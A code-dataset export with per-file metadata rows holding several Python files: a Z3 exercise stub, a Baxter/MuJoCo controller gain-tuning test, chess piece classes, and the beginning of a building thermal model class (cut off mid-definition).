hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ca30cbd11f41f0eefe928d5521c19a48f14a1efc | 137 | py | Python | exercises/practice/propositional-logic/propositional_logic.py | exercism-bot/z3 | 5e32374acd1fa31f15919aa09880f04f1f17f975 | [
"MIT"
] | 6 | 2021-02-16T18:12:57.000Z | 2021-03-18T16:44:26.000Z | exercises/practice/propositional-logic/propositional_logic.py | exercism-bot/z3 | 5e32374acd1fa31f15919aa09880f04f1f17f975 | [
"MIT"
] | 38 | 2021-02-16T15:17:49.000Z | 2021-08-24T07:28:39.000Z | exercises/practice/propositional-logic/propositional_logic.py | exercism-bot/z3 | 5e32374acd1fa31f15919aa09880f04f1f17f975 | [
"MIT"
] | 7 | 2021-02-17T14:04:33.000Z | 2021-06-01T08:16:50.000Z | from z3 import *
def propositional_logic_proofs(A, B):
# TODO: Write your code here
# Return the 3 theorems in order
pass
| 15.222222 | 37 | 0.678832 | 21 | 137 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019802 | 0.262774 | 137 | 8 | 38 | 17.125 | 0.881188 | 0.416058 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0 | 1 | 0.333333 | false | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
ca62c2c71ff1a289688163e7d50e8123d9a5185d | 18,934 | py | Python | opentamp/src/test/test_policy_hooks/test_baxter_controller.py | Algorithmic-Alignment-Lab/openTAMP-legacy | 3b7c3be164cc968ad77a928286d6460cd70a670e | [
"MIT"
] | 2 | 2022-03-09T19:48:20.000Z | 2022-03-26T17:31:07.000Z | opentamp/src/test/test_policy_hooks/test_baxter_controller.py | Algorithmic-Alignment-Lab/OpenTAMP | eecb950bd273da8cbed4394487630e8453f2c242 | [
"MIT"
] | null | null | null | opentamp/src/test/test_policy_hooks/test_baxter_controller.py | Algorithmic-Alignment-Lab/OpenTAMP | eecb950bd273da8cbed4394487630e8453f2c242 | [
"MIT"
] | null | null | null | import unittest, time, main, ipdb
import numpy as np
from mujoco_py import mjcore, mjviewer
from mujoco_py.mjlib import mjlib
from core.parsing import parse_domain_config, parse_problem_config
from core.util_classes.plan_hdf5_serialization import PlanDeserializer
from pma import hl_solver
from opentamp.src.policy_hooks import baxter_controller, policy_solver_utils, tamp_agent
def load_environment(domain_file, problem_file):
domain_fname = domain_file
d_c = main.parse_file_to_dict(domain_fname)
domain = parse_domain_config.ParseDomainConfig.parse(d_c)
p_fname = problem_file
p_c = main.parse_file_to_dict(p_fname)
problem = parse_problem_config.ParseProblemConfig.parse(p_c, domain)
params = problem.init_state.params
return domain, problem, params
def traj_retiming(plan, velocity):
baxter = plan.params['baxter']
rave_body = baxter.openrave_body
body = rave_body.env_body
lmanip = body.GetManipulator("left_arm")
rmanip = body.GetManipulator("right_arm")
left_ee_pose = []
right_ee_pose = []
for t in range(plan.horizon):
rave_body.set_dof({
'lArmPose': baxter.lArmPose[:, t],
'lGripper': baxter.lGripper[:, t],
'rArmPose': baxter.rArmPose[:, t],
'rGripper': baxter.rGripper[:, t]
})
rave_body.set_pose([0,0,baxter.pose[:, t]])
left_ee_pose.append(lmanip.GetTransform()[:3, 3])
right_ee_pose.append(rmanip.GetTransform()[:3, 3])
time = np.zeros(plan.horizon)
# import ipdb; ipdb.set_trace()
for t in range(plan.horizon-1):
left_dist = np.linalg.norm(left_ee_pose[t+1] - left_ee_pose[t])
right_dist = np.linalg.norm(right_ee_pose[t+1] - right_ee_pose[t])
time_spend = max(left_dist, right_dist)/velocity[t]
time[t+1] = time_spend
return time
class TestBaxterController(unittest.TestCase):
def find_baxter_mujoco_pos_vel_controller(self):
deserializer = PlanDeserializer()
plan = deserializer.read_from_hdf5("vel_acc_test_plan.hdf5")
plan.time = np.ones((1, plan.horizon))
plans = [plan]
for plan in plans:
baxter = plan.params['baxter']
cloth = plan.params['cloth_0']
basket = plan.params['basket']
table = plan.params['table']
plan.dX, plan.state_inds, plan.dU, plan.action_inds = policy_solver_utils.get_plan_to_policy_mapping(plan, x_params=[baxter, cloth, basket, table], \
u_attrs=set(['lArmPose', 'lGripper', 'rArmPose', 'rGripper']))
plan.active_ts = (plan.actions[0].active_timesteps[0], plan.actions[-1].active_timesteps[1])
plan.T = plan.active_ts[1] - plan.active_ts[0] + 1
dX, dU = plans[0].dX, plans[0].dU
active_ts = (plan.actions[0].active_timesteps[0], plan.actions[-1].active_timesteps[1])
T = active_ts[1] - active_ts[0] + 1
sensor_dims = {
policy_solver_utils.STATE_ENUM: dX,
policy_solver_utils.ACTION_ENUM: dU
}
x0 = []
for i in range(len(plans)):
x0.append(np.zeros((dX,)))
plan = plans[i]
policy_solver_utils.fill_vector(policy_solver_utils.get_state_params(plan), plan.state_inds, x0[i], plan.active_ts[0])
config = {
'type': tamp_agent.LaundryWorldMujocoAgent,
'x0': x0,
'plans': plans,
'T': T,
'sensor_dims': sensor_dims,
'state_include': [policy_solver_utils.STATE_ENUM],
'obs_include': [],
'conditions': len(plans),
'dX': dX,
'dU': dU,
'solver': None
}
agent = tamp_agent.LaundryWorldMujocoAgent(config)
model = agent.motor_model
# pos_gains = np.array([0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01, 0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01])
# vel_gains = 5e-3
pos_gains = np.array([0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01, 0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01])
vel_gains = 5e-3
# controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
# viewer = mjviewer.MjViewer()
# viewer.start()
# viewer.set_model(model)
x0 = agent.x0[0]
active_ts, params = policy_solver_utils.get_plan_traj_info(plan)
# viewer.cam.distance = 5
# viewer.cam.azimuth = 220
# viewer.cam.elevation = -20
# viewer.loop_once()
# ipdb.set_trace()
# curr_pos_tracker = None
best_avg_err = np.ones((16,))
best_gains = np.zeros((32,))
good_gains = []
for pos_exp in range(-1,2):
for vel_exp in range(-5,--4):
for i in range(10):
pos_gains = np.ones((16)) * i * 10**pos_exp
vel_gains = np.zeros((16,)) * np.random.uniform(0, 10) * 10**vel_exp
controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
avg_err = np.zeros((16,))
torques = np.zeros((16,))
for t in range(0, 30):
cur_t = 0
while cur_t < plan.time[:, t]:
torques += controller.step_control_loop(plan, t+1, cur_t)
model.data.ctrl = controller.convert_torques_to_mujoco(torques)
model.step()
cur_t += 0.0002
cur_pos_error = controller._pos_error(np.r_[baxter.rArmPose[:, t+1], baxter.rGripper[:, t+1], baxter.lArmPose[:, t+1], baxter.lGripper[:, t+1]])
avg_err += cur_pos_error
avg_err /= 30
if np.mean(avg_err) < np.mean(best_avg_err):
best_avg_err = avg_err
print(best_avg_err)
best_gains = np.r_[pos_gains, vel_gains]
if np.all(avg_err) <= 1e-3:
good_gains.append(np.r_[pos_gains, vel_gains])
agent._set_simulator_state(x0, plan, active_ts[0])
model.data.qpos = agent._baxter_to_mujoco(plan, 0)
for _ in range(10):
pos_gains = np.random.random((16,)) * 10**pos_exp
vel_gains = np.random.random((16,)) * 10**vel_exp * 0
controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
avg_err = np.zeros((16,))
torques = np.zeros((16,))
for t in range(0, 30):
cur_t = 0
while cur_t < plan.time[:, t]:
torques += controller.step_control_loop(plan, t+1, cur_t)
model.data.ctrl = controller.convert_torques_to_mujoco(torques)
model.step()
cur_t += 0.0002
cur_pos_error = controller._pos_error(np.r_[baxter.rArmPose[:, t+1], baxter.rGripper[:, t+1], baxter.lArmPose[:, t+1], baxter.lGripper[:, t+1]])
avg_err += cur_pos_error
avg_err /= 30
if np.mean(avg_err) < np.mean(best_avg_err):
best_avg_err = avg_err
best_gains = np.r_[pos_gains, vel_gains]
if np.all(avg_err) <= 1e-3:
good_gains.append(np.r_[pos_gains, vel_gains])
agent._set_simulator_state(x0, plan, active_ts[0])
model.data.qpos = agent._baxter_to_mujoco(plan, 0)
print(best_avg_err)
print(best_gains)
print(good_gains)
print(best_avg_err)
np.save('best_gains_2', best_gains)
np.save('good_gains_2', np.array(good_gains))
# print curr_pos_error
# if curr_pos_tracker is not None:
# print("Error trend")
# print curr_pos_error - curr_pos_tracker
# curr_pos_tracker = curr_pos_error
# viewer.cam.distance = 5
# viewer.cam.azimuth = 220
# viewer.cam.elevation = -20
# viewer.loop_once()
# ipdb.set_trace()
# ipdb.set_trace()
return True
def evaluate_pos_vel_gains(self):
deserializer = PlanDeserializer()
plan = deserializer.read_from_hdf5("vel_acc_test_plan.hdf5")
plan.time = np.ones((1, plan.horizon))
plans = [plan]
for plan in plans:
baxter = plan.params['baxter']
cloth = plan.params['cloth_0']
basket = plan.params['basket']
table = plan.params['table']
plan.dX, plan.state_inds, plan.dU, plan.action_inds = policy_solver_utils.get_plan_to_policy_mapping(plan, x_params=[baxter, cloth, basket, table], \
u_attrs=set(['lArmPose', 'lGripper', 'rArmPose', 'rGripper']))
plan.active_ts = (plan.actions[0].active_timesteps[0], plan.actions[-1].active_timesteps[1])
plan.T = plan.active_ts[1] - plan.active_ts[0] + 1
dX, dU = plans[0].dX, plans[0].dU
active_ts = (plan.actions[0].active_timesteps[0], plan.actions[-1].active_timesteps[1])
T = active_ts[1] - active_ts[0] + 1
sensor_dims = {
policy_solver_utils.STATE_ENUM: dX,
policy_solver_utils.ACTION_ENUM: dU
}
x0 = []
for i in range(len(plans)):
x0.append(np.zeros((dX,)))
plan = plans[i]
policy_solver_utils.fill_vector(policy_solver_utils.get_state_params(plan), plan.state_inds, x0[i], plan.active_ts[0])
config = {
'type': tamp_agent.LaundryWorldMujocoAgent,
'x0': x0,
'plans': plans,
'T': T,
'sensor_dims': sensor_dims,
'state_include': [policy_solver_utils.STATE_ENUM],
'obs_include': [],
'conditions': len(plans),
'dX': dX,
'dU': dU,
'solver': None
}
agent = tamp_agent.LaundryWorldMujocoAgent(config)
model = agent.motor_model
pos_gains = 250 * np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
vel_gains = 1e1
controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
viewer = mjviewer.MjViewer()
viewer.start()
viewer.set_model(model)
viewer.cam.distance = 5
viewer.cam.azimuth = 220
viewer.cam.elevation = -20
viewer.loop_once()
import ipdb; ipdb.set_trace()
x0 = agent.x0[0]
active_ts, params = policy_solver_utils.get_plan_traj_info(plan)
controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
avg_err = np.zeros((16,))
torques = np.ones((16,)) * 0.00001
error_limits = np.array([.2, .75, .2, .075, .075, .5, .001, .001, .05, .5, .2, .075, .075, .5, .001, .001,])
for t in range(0, 30):
cur_t = 0
cur_pos_error = np.ones((16,))
i = 1.0;
while np.any(cur_pos_error > error_limits) and i < 100:#cur_t < plan.time[:,t]:
torques = controller.step_control_loop(plan, t+1, cur_t)
model.data.ctrl = controller.convert_torques_to_mujoco(torques)
model.step()
cur_t += 0.002
cur_pos_error = controller._pos_error(np.r_[baxter.rArmPose[:, t+1], baxter.rGripper[:, t+1], baxter.lArmPose[:, t+1], baxter.lGripper[:, t+1]])
i += 1.0
print(cur_pos_error)
avg_err += cur_pos_error
viewer.loop_once()
import ipdb; ipdb.set_trace()
avg_err /= 30
print(avg_err)
def run_baxter_mujoco_pos_vel_controller(self):
deserializer = PlanDeserializer()
plan = deserializer.read_from_hdf5("vel_acc_test_plan.hdf5")
plan.time = np.ones((1, plan.horizon))
plans = [plan]
for plan in plans:
baxter = plan.params['baxter']
cloth = plan.params['cloth_0']
basket = plan.params['basket']
table = plan.params['table']
plan.dX, plan.state_inds, plan.dU, plan.action_inds = policy_solver_utils.get_plan_to_policy_mapping(plan, x_params=[baxter, cloth, basket, table], \
u_attrs=set(['lArmPose', 'lGripper', 'rArmPose', 'rGripper']))
plan.active_ts = (plan.actions[0].active_timesteps[0], plan.actions[-1].active_timesteps[1])
plan.T = plan.active_ts[1] - plan.active_ts[0] + 1
dX, dU = plans[0].dX, plans[0].dU
active_ts = (plan.actions[0].active_timesteps[0], plan.actions[-1].active_timesteps[1])
T = active_ts[1] - active_ts[0] + 1
sensor_dims = {
policy_solver_utils.STATE_ENUM: dX,
policy_solver_utils.ACTION_ENUM: dU
}
x0 = []
for i in range(len(plans)):
x0.append(np.zeros((dX,)))
plan = plans[i]
policy_solver_utils.fill_vector(policy_solver_utils.get_state_params(plan), plan.state_inds, x0[i], plan.active_ts[0])
config = {
'type': tamp_agent.LaundryWorldMujocoAgent,
'x0': x0,
'plans': plans,
'T': T,
'sensor_dims': sensor_dims,
'state_include': [policy_solver_utils.STATE_ENUM],
'obs_include': [],
'conditions': len(plans),
'dX': dX,
'dU': dU,
'solver': None
}
agent = tamp_agent.LaundryWorldMujocoAgent(config)
model = agent.motor_model
# pos_gains = np.array([0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01, 0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01])
# vel_gains = 5e-3
pos_gains = np.array([0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01, 0.5, 0.5, 0.5, 0.5, 0.5, 1e3, 0.5, 0.01])
vel_gains = 5e-3
# controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
# viewer = mjviewer.MjViewer()
# viewer.start()
# viewer.set_model(model)
x0 = agent.x0[0]
active_ts, params = policy_solver_utils.get_plan_traj_info(plan)
# viewer.cam.distance = 5
# viewer.cam.azimuth = 220
# viewer.cam.elevation = -20
# viewer.loop_once()
# ipdb.set_trace()
# curr_pos_tracker = None
best_avg_err = np.ones((16,))
best_gains = np.zeros((32,))
good_gains = []
for pos_exp in range(-4, 2):
for vel_exp in range(-3, -2):
for i in range(10):
pos_gains = np.ones((16)) * i * 10**pos_exp
vel_gains = np.ones((16,)) * np.random.uniform(0, 10) * 10**vel_exp
controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
avg_err = np.zeros((16,))
for t in range(0, 30):
cur_t = 0
while cur_t < plan.time[:, t]:
torques = controller.step_control_loop(plan, t+1, cur_t)
model.data.ctrl = controller.convert_torques_to_mujoco(torques)
model.step()
cur_t += 0.002
cur_pos_error = controller._pos_error(np.r_[baxter.rArmPose[:, t+1], baxter.rGripper[:, t+1], baxter.lArmPose[:, t+1], baxter.lGripper[:, t+1]])
avg_err += cur_pos_error
avg_err /= 30
if np.mean(avg_err) < np.mean(best_avg_err):
best_avg_err = avg_err
best_gains = np.r_[pos_gains, vel_gains]
if np.all(avg_err) <= 1e-3:
good_gains.append(np.r_[pos_gains, vel_gains])
agent._set_simulator_state(x0, plan, active_ts[0])
model.data.qpos = agent._baxter_to_mujoco(plan, 0)
for _ in range(10):
pos_gains = np.random.random((16,)) * 10**pos_exp
vel_gains = np.random.random((16,)) * 10**vel_exp
controller = baxter_controller.BaxterMujocoController(model, pos_gains=pos_gains, vel_gains=vel_gains)
avg_err = np.zeros((16,))
for t in range(0, 30):
cur_t = 0
while cur_t < plan.time[:, t]:
torques = controller.step_control_loop(plan, t+1, cur_t)
model.data.ctrl = controller.convert_torques_to_mujoco(torques)
model.step()
cur_t += 0.002
cur_pos_error = controller._pos_error(np.r_[baxter.rArmPose[:, t+1], baxter.rGripper[:, t+1], baxter.lArmPose[:, t+1], baxter.lGripper[:, t+1]])
avg_err += cur_pos_error
avg_err /= 30
if np.mean(avg_err) < np.mean(best_avg_err):
best_avg_err = avg_err
best_gains = np.r_[pos_gains, vel_gains]
if np.all(avg_err) <= 1e-3:
good_gains.append(np.r_[pos_gains, vel_gains])
agent._set_simulator_state(x0, plan, active_ts[0])
model.data.qpos = agent._baxter_to_mujoco(plan, 0)
print(best_gains)
print(good_gains)
print(best_avg_err)
np.save('best_gains', best_gains)
np.save('good_gains', np.array(good_gains))
# print curr_pos_error
# if curr_pos_tracker is not None:
# print("Error trend")
# print curr_pos_error - curr_pos_tracker
# curr_pos_tracker = curr_pos_error
# viewer.cam.distance = 5
# viewer.cam.azimuth = 220
# viewer.cam.elevation = -20
# viewer.loop_once()
# ipdb.set_trace()
# ipdb.set_trace()
return True
| 44.973872 | 256 | 0.535914 | 2,367 | 18,934 | 4.033798 | 0.087452 | 0.010054 | 0.012568 | 0.013406 | 0.855467 | 0.85023 | 0.829912 | 0.829912 | 0.823837 | 0.821848 | 0 | 0.041952 | 0.345358 | 18,934 | 420 | 257 | 45.080952 | 0.728358 | 0.078272 | 0 | 0.754658 | 0 | 0 | 0.030684 | 0.003792 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015528 | false | 0 | 0.031056 | 0 | 0.062112 | 0.031056 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ca6f6f03f62a44f7b7f6168b30606dc444d6da2f | 2,607 | py | Python | pieces.py | JuanesLamilla/ChessGame | eeaf2f839aa1f43246a09efb3faab8926203ff94 | [
"Unlicense"
] | 1 | 2021-04-13T00:25:20.000Z | 2021-04-13T00:25:20.000Z | pieces.py | JuanesLamilla/ChessGame | eeaf2f839aa1f43246a09efb3faab8926203ff94 | [
"Unlicense"
] | null | null | null | pieces.py | JuanesLamilla/ChessGame | eeaf2f839aa1f43246a09efb3faab8926203ff94 | [
"Unlicense"
] | null | null | null | class Piece:
"""A chess piece located on the chess board.
=== Public Attributes ===
colour:
The colour of the chess piece. Can either be 'B' or 'W'.
"""
colour: str
def __init__(self, colour: str) -> None:
"""Initialize a new Piece with a given colour.
"""
self.colour = colour
class Pawn(Piece):
"""A chess pawn located on the chess board.
=== Public Attributes ===
start:
True if the pawn has yet to make a move, False if it has moved.
=== Inherited Attributes ===
colour:
The colour of the chess piece. Can either be 'B' or 'W'.
"""
colour: str
start: bool
def __init__(self, colour: str) -> None:
Piece.__init__(self, colour)
self.start = True
def made_first_move(self) -> None:
self.start = False
class Knight(Piece):
"""A chess knight located on the chess board.
=== Inherited Attributes ===
colour:
The colour of the chess piece. Can either be 'B' or 'W'.
"""
colour: str
def __init__(self, colour: str) -> None:
Piece.__init__(self, colour)
class Rook(Piece):
"""A chess rook located on the chess board.
=== Inherited Attributes ===
colour:
The colour of the chess piece. Can either be 'B' or 'W'.
"""
colour: str
def __init__(self, colour: str) -> None:
Piece.__init__(self, colour)
class Bishop(Piece):
"""A chess bishop located on the chess board.
=== Inherited Attributes ===
colour:
The colour of the chess piece. Can either be 'B' or 'W'.
"""
colour: str
def __init__(self, colour: str) -> None:
Piece.__init__(self, colour)
class Queen(Piece):
"""A chess queen located on the chess board.
=== Inherited Attributes ===
colour:
The colour of the chess piece. Can either be 'B' or 'W'.
"""
colour: str
def __init__(self, colour: str) -> None:
Piece.__init__(self, colour)
class King(Piece):
"""A chess king located on the chess board.
=== Inherited Attributes ===
colour:
The colour of the chess piece. Can either be 'B' or 'W'.
"""
colour: str
def __init__(self, colour: str) -> None:
Piece.__init__(self, colour)
| 24.364486 | 76 | 0.518604 | 304 | 2,607 | 4.269737 | 0.157895 | 0.086287 | 0.140216 | 0.09168 | 0.755008 | 0.755008 | 0.755008 | 0.70416 | 0.70416 | 0.70416 | 0 | 0 | 0.37898 | 2,607 | 106 | 77 | 24.59434 | 0.801729 | 0.432681 | 0 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.71875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
ca94c4ce9066d44ccbef8e92f79377d48322c5ac | 207,512 | py | Python | cobmo/building_model.py | liyou-web/cobmo | 1a3016ea29e412c6fed32fda9eb60890d17344df | [
"MIT"
] | 5 | 2019-03-08T06:10:08.000Z | 2021-04-20T13:40:59.000Z | cobmo/building_model.py | liyou-web/cobmo | 1a3016ea29e412c6fed32fda9eb60890d17344df | [
"MIT"
] | 4 | 2019-04-10T03:14:12.000Z | 2021-01-08T09:00:08.000Z | cobmo/building_model.py | liyou-web/cobmo | 1a3016ea29e412c6fed32fda9eb60890d17344df | [
"MIT"
] | 3 | 2019-09-02T21:18:52.000Z | 2021-04-26T01:23:37.000Z | """Building model module."""
import cvxpy as cp
import numpy as np
import pandas as pd
import scipy.linalg
import scipy.interpolate
import typing
import cobmo.config
import cobmo.data_interface
import cobmo.utils
logger = cobmo.config.get_logger(__name__)
class BuildingModel(object):
"""Building model object consisting of the state space model for the given scenario. The model includes
index sets for states / controls / disturbances / outputs, the state / control / disturbance / state-output /
control-output / disturbance-output matrices and disturbance / electricity price / output constraint timeseries.
- The building model object constructs the state space model matrices and index sets
according to the building model equations which are documented CoBMo's technical documentation.
- The required `building_data` object for the given scenario is obtained from the database
through `cobmo.data_interface`.
- The building can be connected to the electric grid, the thermal grid or both, which is controlled through the
keyword arguments `connect_electric_grid` / `connect_thermal_grid_cooling` / `connect_thermal_grid_heating`
as explained below.
Syntax
``BuildingModel(scenario_name)``: Instantiate building model for given `scenario_name`.
Parameters:
scenario_name (str): CoBMo building scenario name, as defined in the data table `scenarios`.
Keyword Arguments:
timestep_start (pd.Timestamp): If provided, will used in place of `timestep_start` from the scenario definition.
timestep_end (pd.Timestamp): If provided, will used in place of `timestep_end` from the scenario definition.
timestep_interval (pd.Timedelta): If provided, will used in place of `timestep_interval` from the scenario definition.
connect_electric_grid (bool): If true, the output variable `grid_electric_power` will be defined to express the
total electric power demand at the electric grid connection point. Additionally, the control variables
`plant_thermal_power_cooling` / `plant_thermal_power_heating` will be defined to enable controlling how much
of the thermal demand is supplied through a local cooling / heating plant, hence translating the
thermal demand into electric demand.
connect_thermal_grid_cooling (bool): If true, the output variable `grid_thermal_power_cooling` will be defined
to express the thermal power cooling demand at the thermal cooling grid (district cooling system)
connection point. Additionally, the control variable `grid_thermal_power_cooling` will be defined to
allow controlling how much of the thermal demand is supplied through the thermal grid connection (as
opposed to supplying it through a local cooling plant.
connect_thermal_grid_heating (bool): If true, the output variable `grid_thermal_power_cooling` will be defined
to express the thermal power heating demand at the thermal heating grid (district heating system)
connection point. Additionally, the control variable `grid_thermal_power_heating` will be defined to
allow controlling how much of the thermal demand is supplied through the thermal grid connection (as
opposed to supplying it through a local heating plant.
with_validation_outputs (bool): If true, additional validation output variables for the surface temperature,
surface exterior irradiation heat transfer and surface interior convection heat transfer will be defined.
Attributes:
scenario_name (str): CoBMo building scenario name.
states (pd.Index): Index set of the state variables.
controls (pd.Index): Index set of the control variables.
disturbances (pd.Index): Index set of the disturbance variables.
outputs (pd.Index): Index set of the output variables.
timesteps (pd.Index): Index set of the timesteps.
timestep_interval (pd.Timedelta): Timestep interval, assuming a constant interval between all timesteps.
state_matrix (pd.DataFrame): State matrix.
control_matrix (pd.DataFrame): Control matrix.
disturbance_matrix (pd.DataFrame): Disturbance matrix.
state_output_matrix (pd.DataFrame): State output matrix.
control_output_matrix (pd.DataFrame): Control output matrix.
disturbance_output_matrix (pd.DataFrame): Disturbance output matrix.
state_vector_initial (pd.Series): Initial state vector, describing the state variable values at
the first timestep.
disturbance_timeseries (pd.DataFrame): Disturbance timeseries.
electricity_price_timeseries (pd.DataFrame): Electricity price timeseries.
output_minimum_timeseries (pd.DataFrame): Minimum output constraint timeseries.
output_maximum_timeseries (pd.DataFrame): Maximum output constraint timeseries.
"""
scenario_name: str
states: pd.Index
controls: pd.Index
disturbances: pd.Index
outputs: pd.Index
timesteps: pd.Index
timestep_interval: pd.Timedelta
state_matrix: pd.DataFrame
control_matrix: pd.DataFrame
disturbance_matrix: pd.DataFrame
state_output_matrix: pd.DataFrame
control_output_matrix: pd.DataFrame
disturbance_output_matrix: pd.DataFrame
state_vector_initial: pd.Series
disturbance_timeseries: pd.DataFrame
electricity_price_timeseries: pd.DataFrame
output_minimum_timeseries: pd.DataFrame
